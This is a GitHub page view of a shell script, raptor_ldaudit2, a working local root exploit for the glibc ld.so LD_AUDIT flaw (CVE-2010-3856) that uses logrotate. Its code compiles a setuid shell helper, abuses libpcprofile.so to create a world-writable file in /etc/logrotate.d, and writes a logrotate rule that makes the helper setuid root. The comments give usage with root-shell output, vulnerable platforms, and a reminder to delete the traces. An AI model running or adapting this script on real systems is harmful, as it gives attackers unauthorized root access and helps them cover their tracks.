-
Notifications
You must be signed in to change notification settings - Fork 115
/
raptor_ldaudit2
84 lines (77 loc) · 2.68 KB
/
raptor_ldaudit2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/bin/sh
#
# $Id: raptor_ldaudit2,v 1.2 2011/02/04 11:04:36 raptor Exp $
#
# raptor_ldaudit2 - another glibc ld.so exploit (logrotate)
# Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x
# before 2.12.2, does not properly restrict use of the LD_AUDIT environment
# variable to reference dynamic shared objects (DSOs) as audit objects, which
# allows local users to gain privileges by leveraging an unsafe DSO located in
# a trusted library directory, as demonstrated by libpcprofile.so
# (CVE-2010-3856).
#
# "Suit up. Score chicks. Be awesome." -- Barney Stinson
#
# This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben
# Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344
#
# This exploit uses the logrotate attack vector. See also the cron.d version
# available at: http://www.0xdeadbeef.info/exploit/raptor_ldaudit
#
# Usage:
# $ chmod +x raptor_ldaudit2
# $ ./raptor_ldaudit2
# [...]
# Everything looks fine.
# Just wait until logrotate is run and check /tmp/pwned.
# [...]
# $ /tmp/pwned
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root),100(users)
# sh-4.1#
# [don't forget to delete /tmp/pwned* and /var/log/runme*!]
#
# Vulnerable platforms:
# Slackware 13.1 [tested]
# openSUSE 11.3 [untested]
# Fedora Core 13 [untested]
# RHEL/CentOS 5 [untested]
# Ubuntu 10 [untested]
# [...]
#
echo "raptor_ldaudit2 - another glibc ld.so exploit (logrotate)"
echo "Copyright (c) 2010 Marco Ivaldi <raptor@mediaservice.net>"
echo
# prepare setuid shell helper to circumvent bash checks
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c
if [ $? -ne 0 ]; then
echo "Error: Problems compiling setuid shell helper, check your gcc."
exit 1
fi
# create a fake log file in /var/log
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/var/log/runme" ping 2>/dev/null
# do the magic!
runme="/etc/logrotate.d/runme"
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null
if [ "`cat $runme 2>/dev/null`" = "" ]; then
echo "Error: Not vulnerable or wrong attack vector? See comments."
exit 1
fi
# build the logrotate script
echo "/var/log/runme {" > $runme
echo "daily" >> $runme
echo "size=0" >> $runme
echo "firstaction" >> $runme
echo "chown root /tmp/pwned;chmod 4755 /tmp/pwned;rm -f $runme" >> $runme
echo "endscript" >> $runme
echo "}" >> $runme
# legen -- wait for it -- dary!
echo "Everything looks fine."
echo "Just wait until logrotate is run and check /tmp/pwned."